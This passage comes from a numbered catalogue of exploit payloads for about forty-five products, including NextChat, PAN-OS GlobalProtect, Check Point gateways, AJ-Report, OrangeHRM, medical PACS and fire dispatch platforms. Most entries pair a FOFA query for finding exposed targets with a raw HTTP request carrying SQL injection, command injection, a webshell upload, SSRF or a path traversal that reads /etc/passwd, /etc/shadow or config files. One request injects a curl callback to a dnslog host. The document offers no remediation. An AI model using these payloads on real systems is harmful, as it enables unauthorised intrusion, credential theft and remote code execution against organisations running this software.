Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (科立讯) Communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (科立讯) Communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (科立讯) Communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (科立讯) Communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (科立讯) Communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter is used to pass the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C校园网自助服务系统 flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
